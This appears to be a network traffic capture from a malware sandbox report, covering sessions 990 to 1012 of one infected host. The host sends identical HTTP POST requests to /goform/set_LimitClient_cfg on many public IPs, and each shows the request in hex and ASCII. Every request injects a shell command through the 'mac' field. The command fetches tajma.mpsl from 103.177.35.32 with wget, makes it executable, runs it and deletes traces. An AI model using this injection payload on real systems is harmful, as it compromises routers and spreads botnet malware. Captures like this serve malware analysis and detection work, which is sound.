                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        990192.168.2.2354608217.230.244.768080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.440989971 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        991192.168.2.235412667.103.138.1608080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.441057920 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        992192.168.2.235080667.119.138.158080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.441402912 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        993192.168.2.2351716208.194.159.318080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.441402912 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        994192.168.2.235476659.145.162.598080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.441417933 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        995192.168.2.2336778211.39.129.798080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.441448927 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        996192.168.2.233863638.102.63.628080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.441466093 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        997192.168.2.2344704182.252.175.1788080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.441576004 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        998192.168.2.234766079.216.210.38080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.441589117 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        999192.168.2.2358424188.236.220.1728080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.441649914 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1000192.168.2.235360662.128.43.648080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.441660881 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1001192.168.2.235654838.154.87.2538080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.441684008 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1002192.168.2.235202874.252.104.58080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.441714048 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1003192.168.2.236077284.253.94.1258080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.441766024 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1004192.168.2.2341820213.139.17.2048080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.441788912 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1005192.168.2.234772892.30.96.1438080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.441804886 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1006192.168.2.2355820117.56.221.1018080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.441831112 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1007192.168.2.2342814150.213.42.1018080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.441844940 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1008192.168.2.2351668219.200.31.1498080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.441869974 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1009192.168.2.2335412141.126.73.588080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.441900969 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1010192.168.2.235957037.70.176.338080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.441912889 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1011192.168.2.2360810202.192.196.1588080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.442128897 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1012192.168.2.2337516217.77.93.2048080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.442150116 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
